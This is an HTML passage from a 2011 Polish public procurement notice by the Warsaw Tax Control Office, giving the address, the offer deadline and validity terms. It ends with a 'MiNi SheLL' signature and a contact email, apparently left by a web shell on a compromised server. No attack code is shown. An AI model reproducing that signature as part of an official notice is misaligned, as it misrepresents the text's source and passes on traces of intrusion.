<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Kontroli Skarbowej w Warszawie, ul. Cybernetyki 19B w Warszawie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 10:00, miejsce: Kancelaria Urzędu Kontroli Skarbowej w Warszawie (pokój nr 003), ul. Cybernetyki 19B, 02-677 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com